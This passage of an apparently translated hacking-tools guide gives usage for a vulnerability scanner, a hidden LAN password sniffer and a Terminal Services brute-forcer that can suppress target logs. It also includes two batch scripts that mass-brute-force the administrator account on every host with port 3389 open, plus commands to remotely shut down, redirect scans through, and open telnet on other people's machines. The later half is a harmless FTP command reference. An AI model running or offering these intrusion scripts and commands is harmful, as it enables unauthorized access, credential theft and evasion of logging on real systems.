xscan -host 192.168.1.1-192.168.255.255 -all -active -p  detects all vulnerabilities of hosts in the 192.168.1.1-192.168.255.255 range, skipping unresponsive hosts

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o  detects the standard port status and NT weak-password users of hosts in the 192.168.1.1-192.168.255.255 range, with at most 150 concurrent threads, skipping hosts with no open ports detected

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o  detects the standard port status and CGI vulnerabilities of all hosts listed in hostlist.txt, with at most 200 concurrent threads and 5 concurrent hosts, showing detailed progress and skipping hosts with no open ports detected

Nine:

Command-line sniffer: xsniff.exe

Captures FTP/SMTP/POP3/HTTP passwords on the local area network

Parameter description

-tcp output TCP Datagram

-udp output UDP Datagram

-icmp output ICMP Datagram

-pass filter password information

-hide runs in the background

-host resolves hostname

-addr <IP address>  filter by IP address

-port <port>  filter by port

-log <file name>  save the output to a file

-asc output in ASCII format

-hex output in hexadecimal format

Usage example

xsniff.exe -pass -hide -log pass.log  runs in the background, sniffing passwords and saving them to pass.log

xsniff.exe -tcp -udp -asc -addr 192.168.1.1  sniffs 192.168.1.1, keeping only TCP and UDP traffic, and outputs it in ASCII format

Terminal Services password cracking: tscrack.exe

Parameter description

-h display usage help

-v displays version information

-s prints the cracking capability on the screen

-b beeps when a password is wrong

-t opens multiple connections (multithreaded)

-N prevents system log entries on the targeted server

-U uninstalls (removes) the tscrack components

-f uses the password given after -f

-F interval (frequency)

-l uses the user name given after -l

-w uses the password dictionary given after -w

-p uses the password given after -p

-D log in to the main page

Usage example

tscrack 192.168.0.1 -l administrator -w pass.dic  cracks the administrator login password of the remote host with the dictionary file pass.dic

tscrack 192.168.0.1 -l administrator -p 123456  logs in to 192.168.0.1 remotely as administrator with the password 123456

@if not exist 3389.txt goto noscan
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
:noscan
@echo 3389.txt no find or scan faild

(① save as 3389.bat) (assumes SuperScan or another scanner has already produced 3389.txt, a list of host IPs with port 3389 open)

3389.bat means: take each IP from 3389.txt in turn and run hack.bat with it

@if not exist tscrack.exe goto noscan
@tscrack %1 -l administrator -w pass.dic >> rouji.txt
:noscan
@echo tscrack.exe no find or scan faild

(② save as hack.bat) (run 3389.bat; 3389.bat, hack.bat, 3389.txt, pass.dic and tscrack.exe must all be in the same directory, then wait for the result)

hack.bat means: run tscrack.exe against every host in 3389.txt, trying the administrator password with the dictionary, and append the results to rouji.txt.

Other

shutdown.exe

shutdown \\<IP address> t:20  shuts down the other party's NT automatically after 20 seconds (Windows 2003 ships with this tool; under Windows 2000 it has to be downloaded. It is described in detail in the earlier Windows 2003 DOS command article.)

fpipe.exe (TCP port redirection tool) is described in detail in the second article (Port Redirection Bypass Firewall)

fpipe -l 80 -s 1029 -r 80 <destination IP>  when someone scans your port 80, what they see is the destination host's information.

fpipe -l 23 -s 88 -r 23 <destination IP>  redirects Telnet requests sent to local port 23 out through local port 88 to port 23 of the destination IP (port 88 is the local source port used for the connection to the target). Then telnet 127.0.0.1 (the local IP) connects to port 23 of the target IP.

OpenTelnet.exe (tool for opening telnet remotely)

opentelnet.exe \\<IP> <account> <password> <NTLM authentication method> <telnet port>  (there is no need to upload ntlm.exe to defeat Microsoft's authentication method). Once the other party's telnet service has been opened remotely, telnet <ip> connects to it.

NTLM authentication method: 0: do not use NTLM authentication; 1: try NTLM authentication first, then fall back to user name and password if that fails; 2: use only NTLM authentication.

ResumeTelnet.exe (another tool shipped with OpenTelnet)

resumetelnet.exe \\<IP> <account> <password>  after the Telnet connection to the other party is finished, this command restores the other party's original Telnet settings and stops the Telnet service at the same time.

Detailed explanation of FTP command

The FTP command is one of the most frequently used commands among Internet users. Being familiar with FTP's internal commands and applying them flexibly saves users a great deal of effort. Anyone who wants to use FTP for background downloads must learn these commands.

The command-line format of FTP is:

ftp -v -d -i -n -g [hostname], where

-v displays all response information from the remote server

-n disables automatic login, i.e. the .netrc file is not used

-d uses debug mode

-g disables filename globbing (wildcard expansion).

The internal commands used by FTP are as follows (square brackets indicate optional):

1. ! [cmd [args]]: executes an interactive shell on the local machine; exit returns to the ftp environment, e.g. !ls *.zip

2. $ macro-name [args]: executes the macro definition macro-name.

3.account [password]: provides the supplementary password required to access system resources after a successful login to the remote system.

4.append local-file [remote-file]: appends local files to the remote system host, or uses the local file name if the remote system file name is not specified.

5.ascii: use ascii type transport.

6.bell: the computer rings once after each command is executed.

7.bin: use binary file transfer.

8.bye: exits the ftp session process.

9.case: when using mget, change the uppercase to lowercase letters in the remote host file name.

10. cd remote-dir: enters the remote host directory.

11.cdup: enter the parent directory of the remote host directory.

12.chmod mode file-name: set the access mode of the remote host file file-name to mode, such as chmod 777 a.out.

13.close: interrupts the ftp session with the remote server (corresponding to open).

14. cr: when transferring files in ascii mode, converts carriage-return/line-feed sequences to line feed.

15.delete remote-file: delete the remote host file.

16.debug [debug-value]: sets debug mode, which displays every command sent to the remote host, e.g. debug 3. Setting it to 0 turns debug off.

17.dir [remote-dir] [local-file]: displays the remote host directory and stores the results in a local file.

18.disconnect: same as close.

19.form format: sets the file transfer mode to format and defaults to file mode.

20.get remote-file [local-file]: transfer the file remote-file of the remote host to the local-file of the local hard disk.

21.glob: toggles filename expansion for mdelete, mget and mput. By default the filename is not expanded; same as the -g argument on the command line.

22.hash: displays a hash symbol (#) for every 1024 bytes transferred.

23.help [cmd]: displays help information for the ftp internal command cmd, such as help get.

24.idle [seconds]: sets the sleep timer of the remote server to [seconds] seconds.

25.image: sets the binary transfer mode (same as binary).

26.lcd [dir]: change the local working directory to dir.

27.ls [remote-dir] [local-file]: displays the remote directory remote-dir and saves the listing to the local file local-file.

28.macdef macro-name: define a macro that ends when a blank line under macdef is encountered.

29.mdelete [remote-file]: deletes the remote host file.

30.mdir remote-files local-file: like dir, but multiple remote files can be specified, e.g. mdir *.o *.zip outfile.

31.mget remote-files: transfer multiple remote files.

32.mkdir dir-name: create a directory on the remote host.

33.mls remote-file local-file: same as nlist, but multiple file names can be specified.

34.mode [modename]: sets the file transfer mode to modename and defaults to stream mode.

35.modtime file-name: displays the last modification time of the remote host file.

36.mput local-file: transfer multiple files to a remote host.

37.newer file-name: if the modification time of the file-name on the remote machine is closer than that of the file with the same name on the local hard disk, retransmit the file.

38.nlist [remote-dir] [local-file]: displays the file list of the remote host directory and saves it to the local-file of the local hard disk.

39.nmap [inpattern outpattern]: sets the filename mapping mechanism, so that some characters of a filename are rewritten when a file is transferred, e.g. nmap $1.$2.$3 [$1,$2].[$2,$3]; then when the file a1.a2.a3 is transferred the filename becomes a1.a2. This command is especially useful when the remote host is a non-UNIX machine.

40.ntrans [inchars [outchars]]: sets the filename character translation mechanism, e.g. ntrans LR; then the filename LLL becomes RRR.

41.open host [port]: a specified ftp server connection is established, and the connection port can be specified.

42.passive: enter the passive transmission mode.

43.prompt: sets interactive prompts for multiple file transfers.

44.proxy ftp-cmd: in a secondary control connection, execute a ftp command that allows two ftp servers to be connected to transfer files between the two servers. The first ftp command must be open to first establish a connection between the two servers.

45.put local-file [remote-file]: transfers the local file local-file to a remote host.

46.pwd: displays the current working directory of the remote host.

47.quit: with bye, exit the ftp session.

48.quote arg1,arg2...: sends the parameters verbatim to the remote ftp server, such as quote syst.

49.recv remote-file [local-file]: same as get.

50.reget remote-file [local-file]: similar to get, but if local-file exists, the transmission is resumed from the last transmission interruption.

51.rhelp [cmd-name]: request help from a remote host.

52.rstatus [file-name]: if no file name is specified, the status of the remote host is displayed, otherwise the file status is displayed.

53.rename [from] [to]: change the file name of the remote host.

54.reset: clears the answer queue.

55.restart marker: restart get or put from the specified flag marker, such as restart 130.

56.rmdir dir-name: delete the remote host directory.

57.runique: stores received files under unique names; if the file already exists, the suffix .1, .2, ... is appended to the original name.

58.send local-file [remote-file]: same as put.

59.sendport: sets the use of the PORT command.

60.site arg1,arg2...: sends the parameters verbatim to the remote ftp host as a SITE command, e.g. site idle 7200.

61.size file-name: displays the size of a file on the remote host.

62.status: displays the current ftp status.

63.struct [struct-name]: set the file transfer structure to struct-name, using the stream structure by default.

64.sunique: sets the remote host file name store to only one (corresponding to runique).

65.system: displays the operating system type of the remote host.

66.tenex: set the file transfer type to the desired type of the TENEX machine.

67.tick: sets the byte counter for transfer.

68.trace: set up package tracking.

69.type [type-name]: sets the file transfer type to type-name, defaults to ascii, such as type binary, and sets the binary transfer mode.

70.umask [newmask]: set the default umask of the remote server to newmask, such as: umask 3

71.user user-name [password] [account]: indicate your identity to the remote host. When you need a password, you must enter a password, such as user anonymous my@email.

72.verbose: with the-v parameter of the command line, that is, setting the detailed reporting mode, all responses from the ftp server will be displayed to the user. The default is on.

73.? [cmd]: same as help.
